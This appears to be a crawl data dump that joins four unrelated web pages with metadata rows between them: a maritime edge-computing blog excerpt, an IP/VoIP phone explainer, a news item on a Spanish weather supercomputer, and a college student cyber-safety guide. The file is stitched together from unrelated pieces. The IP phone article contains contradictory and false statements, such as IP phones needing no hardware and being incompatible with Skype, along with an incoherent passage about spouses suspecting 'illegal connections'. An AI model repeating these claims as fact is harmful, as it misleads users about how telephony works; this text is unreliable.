These sensors often monitor tendencies and changes in vital processes and devices, collecting data as often as every millisecond. If no changes occur, continuously transmitting all that data to the cloud would be a waste of both bandwidth and processing power – an hourly update or even an end-of-the-day report might be sufficient.
An edge gateway stores, analyses and filters the data locally, generates insights and forwards only the necessary the data to the cloud.
Solving the connectivity challenge
All industries may benefit from IIoT advances and developments, but edge computing is particularly interesting to the marine sector due to the obvious challenges with connectivity and bandwidth.
While traversing the open seas network connectivity and coverage may be unstable and unreliable, and bandwidth may be scarce. With more and more automated systems, machinery and devices relying on real-time data processing, not being able to transfer that data to the cloud to be processed may have a major impact on the operation in terms of productivity, efficiency and profitability.
More importantly, it may affect safety and security for personnel onboard the vessel, as heavy operating machinery depends on automated alarm triggers and kill switches to prevent potentially catastrophic incidents and accidents.
By employing edge computing, connectivity will no longer be an issue, as the locally installed gateways are able to process the data and act accordingly – whether that action is to trigger an alarm, shut a valve or hit the kill switch.
Eliminating network latency
While there are many benefits to edge computing, the most important aspect of this innovative IIoT technology is its ability to process data in real-time – near eliminating network latency.
With cloud processing all data must be transmitted to the cloud, analyzed and forwarded to a computer hub – or sent back to the device in question to trigger an action. And every “jump” the data makes introduces latency to the network. Even in a closed network it is not uncommon for as much as two seconds of latency to occur.
Latency and delayed data transfer may have a real impact on operations, as well as severe implications for onboard safety and security.
If, for instance, a crane weighing several tonnes is in the process of rotating and a sensor notices an unforeseen obstruction in its path a braking mechanism must trigger immediately.
One second of latency may be the difference between a near miss and a catastrophe.
Edge computing moves the bulk of data processing from the cloud to the edge of your network. By doing so, edge technology offers several important benefits:
- Real-time data analysis
- Reduced latency
- Immediate automated action when required
- Reduced overall data traffic
This relieves the network of data congestion, reduces the system’s connectivity dependency, and plays a major role in ensuring the safety and security of everyone and everything onboard a vessel.
Ready to push the edge?
Hatteland Technology has extensive expertise and experience in the field of edge computing and IIoT technologies. If you are interested in exploring edge computing, our knowledgeable consultants may assist you in identifying your hardware and network needs – and help you design your optimal solution. | <urn:uuid:0d077f2a-bb3e-4c0f-b9b6-8245834f7a30> | CC-MAIN-2022-40 | https://www.hattelandtechnology.com/blog/pushing-data-processing-to-the-edge-the-benefits-of-edge-computing-in-maritime-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00488.warc.gz | en | 0.930046 | 1,104 | 2.546875 | 3 |
What is an IP Phone and Who Should Get One Right Away?
Internet Protocol phone is a telephone that is used in conjunction with a voice over IP (VoIP) telephone system. The IP phone is a device that connects directly to the Internet and transforms voice into IP packets which are then converted voice when delivered to the recipient.
The technology incorporates SIP signaling and is used in combination with an IP PBX in an organization or a hosted VoIP service to communicate with customers and employees. An IP phone may also be software that is installed on the user’s computer and used to make calls from there.
You may have seen IP phones in workplaces without knowing it.
It is a kind of phone that resembles conventional office phones but uses a separate technology to power calls.
Many businesses, particularly small ones, struggle with phone calls. In your effort to update your company’s phone system, you have probably come across IP phones. What are they, and how might they improve your communications?
This article will provide an in-depth discussion of IP telephony.
What is an IP Phone
IP phones are also known as VoIP phones can be simple software-based softphones or purpose-built hardware devices that appear much like an ordinary or cordless telephone. IP phones function by reading the analog speech signals generated by a person and converting them to digital voice signals.
How does it work?
Additionally, IP phones operate by intercepting telephone calls and passing them via an IP phone system, also known as a VoIP system, through a network cable, into the network, before being broadcast out and onto the internet.
The SIP (Session Initiation Protocol) protocol is used by IP phone systems to connect calls made from a desk phone, mobile app, or browser to the public switched telephone network (PSTN).
This new approach replaces the more familiar PBX system with call handling software, which directs incoming phone calls to the appropriate extension or device.
When wondering what a VoIP phone is, you may also be interested in learning about the other functions it offers. As a result of its inherent flexibility, VoIP may include a slew of features that would normally be associated with a conventional business phone system, like voicemail, automated answering services, call forwarding, ACD, and holding music, among other functions.
Some of the finest IP phones are powered by current smartphone operating systems like Android, which enables them to support sophisticated capabilities such as video conferencing, multi-user conversations, and contact and schedule management. These can also be used in conjunction with audio conferencing services to maximize the effectiveness of your discussions.
Cisco, Poly, Grandstream IP phones, Mitel, and many more such as Nextiva and RingCentral are just a few of the prominent names in the VoIP market. These firms have carved out a sizable portion of the IP phone industry by providing critical features such as fast dial buttons, graphical displays, and Bluetooth connectivity.
What are the benefits?
IP phone systems provide many advantages to companies of all sizes, but small and developing businesses stand to gain the most from the technology.
IP Phones Are Less Expensive
Most conventional phone lines are purchased in groups of 23. If your company has only a few workers or if you are just starting on your own, this is a non-starter for your firm.
With a virtual IP phone system, your purchase and pay for the number of phone numbers you need at the time of purchase. You can add more as your business grows.
You can also select a calling plan that meets your specific requirements. Have you been on the phone all day? Then you’ll want to search for a package that includes an infinite number of minutes. It may be more cost-effective to use a metered plan if you just need to make a few calls now and then.
Because everything takes place in the cloud, there are no maintenance or installation costs to worry about. When adding or deleting users, you will not need to buy, house, and maintain equipment, nor will you have to pay for technical assistance.
It makes no difference whether you make and receive calls using an IP-enabled desk phone or a mobile application; your IP phone system doesn’t care where you are. You and your workers can work from almost any location where you can connect to the Internet without the need to purchase or install extra hardware.
Are you planning to hire a new employee or two? Great! With a few clicks, you may give them an extension off of your current phone number or generate new business numbers for them on demand at no additional cost.
When you have a copper wire landline, you have to deal with regular maintenance and updates to your phone system. Not only does this result in downtime for your company, but it also means you have to wait for a specialist to arrive.
An IP phone system eliminates the need for on-site maintenance. You conduct maintenance or updates to your phone system from anywhere in the world through the internet. As long as you divert your attention away from phone maintenance, business as usual will continue.
When you select a reputable supplier, you should find it simple to get started with your new VoIP phone system. For example:
- Decide on your strategy. Your provider will work with you to design a package with a variety of calling and extra features to suit your requirements.
- Choose a phone number for yourself. A large selection of local, toll-free, and personalized phone numbers from which you can choose are available.
- Inform your service provider about your situation. Your chosen provider will only gather the information necessary to properly service your account.
- Set up a payment plan.
That’s all there is to it! If you pick the correct provider, you can begin managing your account and making calls from your mobile app as soon as you download the software.
How does IP calling work?
VoIP services are well-known for their adaptability and ease of use. However, it takes a few moments to grasp how to work with the technology. If a company does not want to completely adapt to VoIP service, a hybrid system is possible.
This alternative works well for companies that wish to retain their conventional phones. They can still use VoIP technology if they put adapters on their terminals.
Making a phone call is as simple as following the same procedures you have always used to make a phone call; no magic is involved. When you lift the handset (or use the speakerphone or a headset device), you will hear a dial tone.
Then you dial the number you want to contact, and the phone will begin to ring. You are free to express yourself to your heart’s content.
No matter whether this is to a mobile phone, computer, landline phone, or another VoIP service, the system accepts it. It is possible that your call will be routed via the Internet and then switched to the Public Switched Telephone Network (PSTN) at a point near to the destination if it is directed to a landline on the Public Switched Telephone Network (PSTN).
IP Phone Networks?
The use of IP phone networks and IP phones together allows for the transmission and reception of digital communications. IP phone systems must have three components to function properly and transmit and receive IP voice digital signals.
For an IP phone system to function, it must have both an IP phone (also known as a VoIP phone) and an IP PBX, also known as a VoIP private branch exchange. A Local Area Network (LAN) is used to link these systems to a VoIP service provider, which allows them to communicate with one another (LAN).
The difference from conventional telephone systems is that IP Phone systems operate by sending telephone calls over the Internet, as opposed to traditional telephone systems that operate via circuit-switched telephony networks.
History – What is an IP Phone?
IP phone systems were first introduced in 1995 by Alon Cohen. VocalTec is the name of the business that invented the first IP phone, which was used by a wide range of individuals at the time. They function by sending voice data packets over the internet from one IP address to another.
At the time, the setup was straightforward, consisting of one internet user contacting another and using a basic microphone and speaker connected to a laptop computer. In a very short time, this system began to develop further, eventually evolving into the system it is today.
Cohen developed VoIP technology but did not make it available to the general public until the following year. Early versions only included the ability to send and receive voicemails over the Internet. This was later extended to include computer-to-telephone connections.
From 1996 to 1998, VocalTec focused on integrating Internet voicemail apps with their internet phone software and integrating their internet phone software with Microsoft NetMeeting software.
In 1998, VocalTec introduced computer-to-telephone and phone-to-phone calling capabilities as part of their VoIP service. In the beginning, user adoption of VoIP was poor – just 1 percent – in part because users had to listen to ads before, during, and after their talks, which was inconvenient.
What is a wireless IP phone?
A wireless IP phone is a small, all-in-one cordless telephone that enables people to communicate with one another from anywhere in the globe through a high-speed internet protocol (IP) connection.
PBX phone systems, audio/video conference bridges, data collaboration tools, and instant messaging servers will all be integrated smoothly into a single platform in the future of IP communications systems.
As IP network installations continue to expand, customers are seeking new services, such as the integration of video streaming capabilities, that are both cost-effective and easy to implement.
What is a landline IP phone?
IP landline phones not only help you save money on your phone bills, but they also improve the quality of your calls. Unlike conventional landline phone conversations, the quality of calls made with these sets will be entirely dependent on the speed and reliability of your internet connection.
These phones are becoming more popular among businesses because they operate efficiently and include cutting-edge capabilities. Additionally, the low cost of installation and maintenance for this landline set contributes to overall savings on utility costs.
What is the difference between a traditional phone and an IP phone?
All call-related functions of an IP phone are made accessible via internet services since IP phones are based on the Internet Protocol (IP). The VoIP handset (Voice over Internet Protocol) enables the transmission of voice messages from the caller to the receiver via the internet using a computer.
All internet services are delivered via Ethernet cables, which are linked to a router, which then creates a wireless network connection. Because IP phones operate via the internet protocol, they do not need the additional wiring required by an analog phone system. Furthermore, since it is wireless, IP phones provide users with the additional benefit of mobility.
Why would someone use a VoIP phone?
Many reasons exist for why you might want to switch from your current phone system to a VoIP phone system. The primary motivation for this is cost savings. If you opt to utilize a VoIP phone, you will save money by removing the need for telephone lines and call costs.
However, saving money isn’t the only advantage of using a VoIP phone system. Switching to VoIP phones is less expensive than continuing to use conventional analog phone services.
If you compare VoIP phones pricing to the cost of installing copper or fiber-optic lines for conventional phone service, adding extra ethernet connections or enabling Voice over IP to utilize a Wi-Fi connection will save you a considerable amount of money on your first deployment.
In addition to saving money by using VoIP, you can make lower-cost long-distance calls. VoIP network services from high-quality provider firms are now available all across the world, even in developing countries. When you have access to the internet, you can use a VoIP phone to communicate without incurring international long-distance fees.
Furthermore, you will discover that it is feasible to use your email account to log in to VoIP services while on the road. To communicate with team members and consumers, all you need is a headset or an IP phone. There is no need to search for a local phone number or SIM card while traveling abroad.
Can VoIP call normal phones?
To make a VoIP call, you need a suitable IP phone or VoIP calling app, which has been given an IP address (or, in some cases, a conventional number) that allows calls to be made from your network to a regular telephone or mobile phone. In comparison to landline phones, these provide high-definition (HD) phone calls.
It is simple to call over the internet while making a VoIP call, and it is also feasible to call over the internet when making a VoIP call on a landline. You just need an adapter that connects to either your phone socket in the wall or your router to make an international call on a landline when using a VoIP phone.
To make use of your landline phone, you would normally expect to have a physical connection to a phone line. However, with VoIP, you can continue to use your landline phone while avoiding the limitations, inconvenience, and expenses associated with traditional phone service.
VoIP does not need to operate from a specific telephone or device to be effective and to reap the most advantages of the technology’s features and functions.
All of the important characteristics, such as adaptability, flexibility, and cost-effectiveness, are right at your disposal. If you decide to upgrade to a more advanced handset or even a headset, you will get access to extra user-friendly features such as programmable buttons and call storage, as well as the ability to employ cordless technology.
Call quality is the most frequent concern with VoIP calls. This factor is heavily influenced by the type of your internet connection. More and more service providers are moving to a broadband-by-default service choice that you can use with VoIP. These services are delivered via platforms that offer helpful, extra VoIP capabilities.
Caller identification, voicemail, call diversion, and anonymous call blocking are some of the capabilities available. The flexibility of the system, as well as the selection of devices that can be used with it, is critical for corporate VoIP users, especially for large organizations.
What are the advantages and disadvantages of an IP phone?
One of the advantages of this technology is that it does not require any kind of hardware for communication. No additional equipment or special connection is needed to make or receive phone calls via the internet, therefore there is no need to buy any equipment or make any unique connection.
An IP phone system can be used for both private and commercial communication, making it a versatile tool. An IP phone system gives the user the ability to connect to the global network from any point along the network’s path. This ability is not possible with traditional phone system configurations.
IP networks are dependable and safe. All communications over them are reliable and secure as long as they are handled with caution. Since most IP phones start up automatically when connected to the Internet, they don’t need the purchase of any additional gear to operate properly.
One major disadvantage is that the finest IP phone brands available are only for business or personal conversations, which is not ideal. If you use an unprotected or prepaid cellular phone, the IP service will not offer you any security or privacy protection.
If your spouse or children discover that you are communicating with them via this “hidden” or unprotected means, they may conclude that you are engaged in an illegal connection. As you might imagine, this would be unfortunate news for the person, as well as for his or her spouse and children.
To safeguard your sensitive and confidential conversations, you might want to purchase both a landline telephone and a mobile phone to use in combination with your IP phone system, if you want to be as secure as possible.
The fact that IP phones are not compatible with VoIP services such as Skype or Google Talk is another significant drawback of utilizing an IP phone. These IP-based services operate on protocols that are distinct from normal internet protocols, and as a result, they cannot be used successfully with an IP phone system.
VoIP services are getting more popular as more people switch from landlines and instead rely on their mobile devices for communication purposes. As a result, to get access to these services, company owners will need to purchase a second line that will link to an IP-enabled server.
Can IP phones be used at home?
It is not necessary to have a permanent location to use a VoIP phone system. With VoIP, you may make and receive calls via your internet connection rather than through conventional phone systems that need local infrastructure.
This implies that you can physically transport a VoIP phone to any place where you can connect it to the internet and make and receive calls just as you would if you were in the office.
Your clients will not be aware of the change since your phone number is virtual in the cloud. Your Caller ID appears the same on any identifying display allowing you to do business as usual even if you’re sitting at home in your shorts.
A proper setup is all that is required in addition to a reliable internet connection. Simply connect your VoIP Internet Phone Adapter to any accessible broadband connection and you will be able to use your VoIP phone from any location on the planet.
Further reading: How to Connect Phone to the Ethernet
Using a hosted voice service instead of IP phones is one option to consider. Currently, a plethora of IP webphone providers exist. Most provide a hosted VoIP system that allows users to connect without having to buy IP phones themselves.
Hosted voice service is simply another telephone system that is hosted on a web server and can be accessed via your IP-based mobile device, as opposed to a traditional telephone system.
Consider the following examples: you can use your mobile phone to make a call to any IP-enabled phone system in the globe, and you can also log into the server and make a call from your laptop computer.
An IP phone system provides your business with the economic and long-term advantages it needs to continue to expand. The benefits of using an IP phone are many, including its simplicity of use, reduced maintenance requirements, and ever-improving capabilities.
Using an IP phone system eliminates a large portion of the on-site work needed to maintain a landed telephone system.
There is no need for you to wait for a professional to arrive at the program a new extension, install updates, or conduct a maintenance check on your gear since all of these tasks are performed remotely. | <urn:uuid:f56ca076-ff2e-4e36-aec6-6348e04d64d5> | CC-MAIN-2022-40 | https://callflowsolution.com/what-is-an-ip-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00488.warc.gz | en | 0.946882 | 3,902 | 2.828125 | 3 |
Whether you’re involved in the high performance computing or not, almost every one of your days is likely planned around the findings of HPC-enabled advanced modeling and simulations for weather forecasting that tell us whether to carry an umbrella, wear extra sunscreen, or if the roads will be safe to drive on.
But as more severe weather events occur and the threat of climate change grows more serious, weather forecasting is taking on even more prominence. And the trend of blaming the weatherman for botched predictions is only set to go down as more sophisticated systems and models enter into the climate equation.
Most recently, Spain made steps toward this end by commissioning a new bullx supercomputer through the Spanish Meteorological Agency (AEMET) with the hopes of bolstering the country’s weather forecasting and climate research.
The addition of the Bull supercomputer is expected to help bridge the decades-wide gap that exists between short-term weather forecasting and the extended climate predictions. The result should be a more accurate understanding of climate change that is specific to each of the country’s regions, in each season of the year.
The bullx system is on track to provide performance in the range of 168 teraflops, which represents 75 times the capability of the Cray supercomputer it will replace. Expected to weigh in as Spain’s third-fastest supercomputer, the system will feature Bull’s direct liquid cooling system, which uses water at room temperature to generate energy consumption savings of 20-40 percent compared with traditional air-cooling or cold water-based cooling systems.
To complement the hardware upgrade, AEMET also plans to implement new forecasting models that are capable of making predictions down to the 1-2 mile scale, to better cope with severe local weather such as thunderstorms.
The modeling system, called HARMONIE/Arome has already made its mark on the European meteorology by offering an initial range of 36 hours and spatial resolution of 1.5 miles. The models will focus on the combination of the Iberian Peninsula and Balearic Islands, as well as the Canary Islands.
A large-scale atmospheric chemistry model already in place at AEMET, called MOCAGE, is expected to see improved resolution, more extensive coverage and more accurate air quality predictions. MOCAGE will also have an emergency mode for real-time predictions in case of a hazardous materials leak or other industrial accident.
This news follows a recent trend across the US and Europe of bolstering its climate infrastructure. Most recently, the US National Weather Service announced that it has signed a $44.5 million contract with IBM to deliver a ten-fold increase in computing power. Since Big Blue spun off its x86 biz to Chinese-owned Lenovo, Cray has been tapped to supply the new systems. When the work is completed later this year, NWS will have a combined 5-petaflops of supercomputing capability, enabling it to run the kind of sophisticated weather predictions that are the lifeblood of its mission.
Similarly, the Met Office in the United Kingdom has signed a $128 million deal with Cray for multiple Cray XC supercomputers and Cray Sonexion storage systems. The three-phase, multi-year project represents the largest supercomputer contract ever for Cray outside of the United States, and is expected to complement other Cray systems seeking to answer weather and climate problems posed at the European Center for Medium Range Weather Forecasting (ECMWF) and several other weather prediction and climate forecasting centers worldwide.
The Met Office, like representatives from the US and Spain, is emphasizing the necessity of the upgrades in order to ensure forecast accuracy, which ultimately means greater planning and safety during severe weather events.
This need was recently illustrated when ECMWF accurately predicted the touchdown of Hurricane Sandy on the United States East Coast with the help of two 2.5 petaflops systems, while domestic (US) models running on twin 213-teraflops systems showed the hurricane heading away from land.
Back in Spain, AEMET is planning to further leverage its upgrades by using the bullx system off of land as well. The agency is expanding its focus to encompass maritime forecasting services, wave prediction and hydrological monitoring, where it will predict and study the effects that rain and snow may have on watercourses. | <urn:uuid:a95889fb-6515-4a67-9f0d-e0650e461b65> | CC-MAIN-2022-40 | https://www.hpcwire.com/2015/01/15/spain-grabs-bull-horns/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00488.warc.gz | en | 0.950101 | 897 | 3.234375 | 3 |
Let’s face it…
Cyber safety isn’t the number one concern for college students. That said, recent studies show that hackers are targeting universities and students more frequently. Did you know that private educational institutions receive more malicious emails than any other sector?
Cybercriminals won’t hesitate to steal your sensitive information and hack into your accounts if given a chance. They don’t care if you’re a struggling student without a job. That’s what they look for; they rely on naivety and lack of life experience to fool their victims.
This guide will teach you everything you need to know about staying safe from online criminals. We’ll go into detail about data theft protection, online dating risks, how to protect your bank accounts, social media profiles, and more.
Let’s get started.
College students are exposed to various online threats, whether working on assignments, chatting with friends and family, or just relaxing and watching videos. Dangers include viruses, phishing scams, identity theft, cyberbullying, etc.
While it can be tempting to ignore these dangers and hope they’ll simply disappear, the uncomfortable truth is they are very real and can have serious consequences.
Say a college student’s personal information fell into the wrong hands; hackers could use this data to steal the student’s identity or commit fraud. This is why it’s so important that college students understand how to protect themselves, their peers, and their university from cyber threats.
Hackers could use a student’s data to steal their identity or commit fraud.
It comes as no surprise that most teens and college students spend a lot of time online. According to a survey by Common Sense Media:
84% of teens own a smartphone.
On average, they use their smartphones for seven hours daily.
They watch three hours of online video content per day.
70% of teenage girls use social media every day.
60% of teenagers use computers to complete their homework daily.
Furthermore, a recent study from Frontiers in Psychiatry polled 1,043 college students from King's College London and found that nearly 40% are addicted to their smartphones.
Over seven million US college students enrolled in at least one distance education course, and roughly 3.4 million attended classes exclusively online.
Since the outbreak of Covid-19, students have been spending more time online than ever before. For many, this means more screen time and less physical interaction with others. While some take advantage of the extra time to connect with friends and family online, others find it difficult to stay connected and motivated.
The increase in online time has also led to more opportunities for cyberbullying and other negative behaviors. As we continue to adapt to life with Covid-19, we must learn how to keep college students safe and engaged in their learning.
Several factors make undergraduates more vulnerable to online threats, including:
Sharing too much personal information. Students often have lots of personal information online, including names, addresses, phone numbers, and email addresses. This makes it easy for scammers to target college students with phishing emails and other scams.
They’re unaware of the dangers. Many undergraduates may not be aware of the risks. This lack of understanding makes them vulnerable to personal information requests, such as credit card promotions.
They take more risks. College students may be more likely to take risks online, such as clicking on links from unknown sources or meeting strangers in person.
They don’t often monitor their accounts. Students begin maintaining their finances and using credit cards in college. Many miss fraudulent transactions and fail to check their credit reports regularly.
A student’s lack of awareness makes them vulnerable to the dangers associated with personal information requests on campus.
There are several safety risks college students face online. Some of the most common dangers include:
Cyberbullying — This is a serious problem that can lead to depression, anxiety, and even suicidal thoughts. Cyberbullying among college students is often a continuation of earlier forms of bullying that occurred in middle school or high school.
Phishing scams — Phishing scams are emails or text messages that look like they're from a legitimate source but are actually from a scammer. It’s not uncommon for students to receive emails from scammers impersonating school officials and fall into the trap of paying large sums of money.
Job scams — Job scammers convince students to provide their social security numbers and other sensitive information. Many scam artists even send unsolicited job offers and interview requests.
Identity theft — Identity theft can ruin a student’s credit score, leaving them thousands of dollars in debt.
Fraudulent online shopping sites — Students are always looking for great deals online. Thus, they may wind up clicking on links to fraudulent online shopping websites. These sites appear legitimate (as professional photos are used to mimic real e-commerce sites), but they’re often phishing scams.
Online dating fraud — Many college students use dating apps such as Tinder to look for love online. Unfortunately, many dating profiles are catfishers — scammers using fake accounts to dupe individuals looking for love to obtain money from them.
Campus theft — Theft involving laptops, phones, wallets, etc., is a serious problem on many campuses.
Data breaches — Colleges and universities attract hackers as they store massive quantities of data and personal information. Data includes student grades and the Personal Identifiable Information (PII) of teachers and students. Perpetrators may use techniques like DDoS attacks and Man-in-the-Middle attacks.
Malware — Malware (aka malicious software) infects your computer causing severe problems. Undergrad devices are commonly infected with malware as students often download pirated movies, games, programs, and other files.
Cyberbullying has become an increasingly prevalent problem on college campuses. Thanks to the widespread use of social media, students find it easier to bully their peers anonymously.
In many cases, cyberbullying can be just as damaging as traditional bullying, leading to feelings of isolation, depression, and anxiety. Moreover, because cyberbullying can occur anytime, anywhere, it can be difficult for victims to escape their tormentors.
College administrators and counselors are still trying to figure out the best way to address this problem. In the meantime, victims of cyberbullying need to know that they’re not alone and that plenty of resources are available to help them cope with this difficult situation.
Reach out to a trusted friend or family member for support.
Block the person bullying you and report their behavior to the platform administrator.
Save any evidence of the bullying (e.g., screenshots of abusive messages). This can be used as proof if further action is required.
Talk to a counselor or other mental health professional if you struggle to cope with the situation.
Do not hesitate to reach out for help if you experience cyberbullying. There are people who care and will support you through this difficult time.
A new research study reveals that nearly 90% of institutions are putting students, alumni, and faculty in danger by failing to put email phishing, spoofing, and counterfeit protective measures in place.
As a result, colleges and universities are a large target for cyber attackers armed with fraudulent emails.
It’s not uncommon for a student to receive an email from someone posing as a school official stating that the student has missed their tuition payment.
Scammers threaten victims with severe penalties, such as being dismissed from classes if they don’t pay immediately.
Never click on links in emails or messages unless you're sure they're legitimate. Contact the “source” of the email, such as a university, to verify the message if you're unsure.
Keep an eye out for signs that indicate phishing. These include misspellings, grammatical errors, and spoofed email addresses.
Take caution when giving out private information online. Only give your personal information to websites you trust.
College students comprise the most frequent victims of identity theft. Identity theft is five times more likely to affect students than the average person. This is because undergrads live in close quarters with one another and don’t take enough safety measures.
For example, college students are susceptible to identity theft as personal information is often left unattended in unlocked dorm rooms. Furthermore, some students don’t bother to protect their smartphones with passwords or biometric identification adequately. In addition, undergraduates often use free Wi-Fi networks that are not always secure.
If someone steals your identity, follow these steps to minimize the damage.
1. Contact Experian, Equifax, and TransUnion — three major credit bureaus and place a fraud alert on your credit report. This will prevent criminals from opening new accounts in your name.
2. Contact your bank and other financial institutions with whom you have accounts. Tell them your identity has been stolen and ask them to freeze your accounts.
3. File a police report and identity theft complaint with the Federal Trade Commission to protect you from future fraud and identity theft.
Identity theft is five times more likely to affect students than the average person.
The following are some best practices for using smartphones safely in college:
Keep your personal devices with you at all times. Smartphones are valuable. It's important to keep them with you whenever possible. Consider carrying them in your front pocket or purse instead of a backpack.
Make sure your phone is locked when you're not using it. Set a screen lock password or use biometrics like face recognition or fingerprint security.
Be aware of your surroundings. When you're using your smartphone in public, be mindful of your surroundings, including anyone who can see your screen. Avoid using your phone in deserted areas.
Enable your phone's security settings. These include automatic updates, data backup, Wi-Fi protection features, remote locking, and phone tracking.
Download apps from trusted sources. This includes the App Store for Apple devices and Google Play for Android devices. Fake apps that look legitimate exist; they often contain malware that collects personal information, like social security numbers.
Most college students are very active on social media. But many don't realize the risks associated with sharing too much information.
For example, if you share your location on social media, criminals can easily find you and familiarize themselves with your schedule. This makes it easy for them to commit crimes like burglary or assault.
You should also be careful about sharing personal information, such as your birth date, address, and phone number. Once this information is out there, it's not easy to take it back.
To protect yourself on social media:
Never share your location on social media. If you want to check in somewhere, do it after you've left.
Don't share personal information, such as your address or phone number.
Be careful about who you're friending or following on social media. Only add people with whom you’re familiar.
Regularly review your privacy settings to ensure that only people you want to see your information can see it.
Be careful about sharing personal information, such as your date of birth, address, or phone number on social media.
With the rise of online learning, more and more students are opting to take classes remotely. While this has many advantages, it's essential to be aware of the Internet safety risks involved. Here are a few safety tips for college students enrolled in online classes:
Only use trusted websites and platforms to participate in online courses.
Create strong passwords for all online accounts. Don't use the same password across accounts.
Log out of your online accounts when you finish using them.
Use a VPN and robust antivirus software like Bitdefender or McAfee.
Unfortunately, college students easily fall victim to online shopping scams. Online shopping is popular among today's college students as a result of the pandemic. Take the following precautions to make sure your data remains secure:
Only shop on websites you trust. Be wary of sites with pop-ups and ads that seem suspicious.
When entering your credit card number or other sensitive information, look for "https://" in the URL, indicating the site uses encryption. Keep an eye out for a padlock icon in the address bar.
If using a public Wi-Fi connection, be aware that your information could be compromised. Wait until you're on a secure connection before sharing any sensitive data.
Ensure your computer has up-to-date security software to protect against malware and online threats.
College students buy more products online than ever before.
College students need to be especially careful when it comes to online dating. As many students seek love online, there is no shortage of scammers seeking to capitalize on their feelings.
Cybercriminals often rely on catfishing regarding dating apps. They create false online identities to trick students into financial scams and other fraudulent scenarios.
Safety tips for college students who are looking for love online:
Only use reputable dating websites and apps.
Do your research before meeting anyone in person.
Always meet in a public place and let a friend know where you're going.
Don't give out too much personal information.
Trust your gut. If something feels strange, it probably is.
Armed with these safety tips, you can remain safe from online predators and enjoy a successful online dating experience.
Be extra careful when using a computer that isn’t yours — for example, in libraries, Internet cafes, and school. Follow these digital safety tips:
Beware of unsecured Wi-Fi networks. Public Wi-Fi is often insecure. Try to use it for non-sensitive tasks only. Connect to your Wi-Fi network or use your data plan when possible. Alternatively, use a VPN to encrypt your data while using public Wi-Fi.
Don’t store payment info on websites or browsers. When you make online purchases using a public computer or public Wi-Fi network, don’t store your payment information on the website or browser. Doing so only makes it easy for thieves to access your data.
Secure laptops and other devices. When you’re not using your computer, lock it. Use a strong password, and don’t leave it in plain sight.
Beware of infected devices left on campus. If you find a USB drive or other device on campus (including in your dorm room), don’t plug it into your computer. It could be infected with malware.
Avoid using ATMs in public places. Thieves can install skimming devices on ATMs that capture your card information. When possible, use ATMs located inside banks.
Connect to your Wi-Fi network or use your data plan whenever possible.
You likely don't have a highly secure campus network that restricts and regulates traffic and new devices, so you're on your own regarding online security. Here are tips regarding how college students can remain safe and privacy-savvy on campus.
The best tips for protecting your online accounts include:
Use caution when posting online. Before putting anything on the internet, think carefully. Once it's in cyberspace, you can’t remove it. Don’t put anything online that you don't want your family, other students, instructors, or future and present employers to see!
Use strong passwords. A strong password should have at least 12 characters and contain a mix of uppercase and lowercase letters, numbers, and symbols.
Don't use the same password across accounts. Use a password manager to store and generate strong passwords for you safely. We recommend password managers such as Bitdefender Password Manager and Norton Password Manager.
Always change your password after a data breach. Change your passwords immediately if you think a data breach has exposed your accounts. It’s good practice to change them regularly, as well.
Set up two-factor authentication when available. Two-factor authentication is an extra layer of security that requires you to confirm your identity with a code before logging in.
Be cautious of email phishing signs: poor grammar, bad design, etc. Avoid clicking on links or downloading attachments from unknown sources.
If a device becomes lost or stolen, you'll want to have a backup of all your data. This includes documents, photos, and other important files. If someone hacks you, you can quickly restore your data to its previous state.
How to back up your data:
use an external hard drive or cloud storage service
use iCloud for Apple devices and Drive for Android devices
use an antivirus software solution with automatic backup features
You can help protect yourself from fraud and identity theft by monitoring your financial accounts. As a college student, staying on top of your spending habits is always a good idea to avoid debt.
Take a break from studying and follow these tips when reviewing your bank and credit card statements:
Schedule some time each month to review your statements. Add it to your calendar or set a reminder on your phone so you don't forget.
When reviewing statements, compare the transactions to your records. Contact your bank or credit card company immediately if there are any discrepancies.
Take note of any unusual or large transactions. This could be a sign of fraud or identity theft.
You can help protect yourself from fraud and identity theft by monitoring your financial accounts.
Pop-up blockers are essential tools that keep your computer safe and secure while browsing the internet, especially if you’re using free Wi-Fi provided on campus. They help protect your computer from malicious pop-ups that sometimes contain viruses or spyware. Eliminating unwanted pop-ups will also speed up your browsing experience.
How to block pop-ups in Google Chrome:
1. Open Google Chrome and click on the three lines in the top right corner.
2. Select "Settings" from the menu.
3. Click the "Privacy and Security" option in the left-hand menu.
4. Select "Site Settings" and scroll down until you see the "Pop-ups and Redirects" option.
5. Click on "Don't allow sites to send pop-ups or use redirects."
Universities are already accessible enough targets for hackers; don’t make it easier for threat actors to steal your data. Encryption consists of scrambling your data so only authorized users can access it. When you encrypt your data, it's much more difficult for hackers to steal it.
College students can use encryption tools to protect their data. Here are some of the most common ones available:
Encryption software — These encryption tools are installed on your computer and encrypt all stored data. Examples include BitLocker (Windows) and FileVault (Mac).
Encrypted hard drive — This type of external hard drive is encrypted to protect the data stored inside.
Virtual private network (VPN) — These encryption tools create a secure, private connection between your computer and the Internet. Examples include CyberGhost, PrivateInternetAccess, and ExpressVPN.
You probably use your laptop and smartphone for learning purposes. The more you use a device, the more reason to keep it secure. One of the best ways to keep a device safe is to ensure its software is up-to-date. Hackers can exploit these security vulnerabilities to gain access to your data or take control of your computer.
Enable automatic updates to ensure that your software is always up-to-date. Software updates usually correct all security vulnerabilities. This way, you'll never have to worry about manually installing updates.
In addition to updating your software, it's also important to update your operating system. Operating system updates usually include security patches and new features that can help improve your computer's security.
Always keep your software and operating system up-to-date.
When you get a new computer or mobile device, it's essential to dispose of your old one properly as it may include your personally identifiable information (PII) or that of other students. This includes wiping clean any stored personal data.
To wipe clean your computer or mobile device, use built-in factory reset features:
System > Recovery > Reset this PC (Windows)
Erase All Contents and Settings (Mac, iPhone, or iPad)
System & Updates > Reset (Android)
Alternatively, you can use third-party tools to securely delete all the data on your hard drives, such as CCleaner and those included with antivirus software. Once you've wiped clean your old device, you can recycle, sell, or donate it to another student without worry.
Most college students don’t consider using antivirus solutions until their computer gets a virus. However, it's important to use an antivirus to protect yourself from malware, such as spyware, trojan viruses, adware, ransomware, and other online safety threats. An antivirus will also protect your personal information.
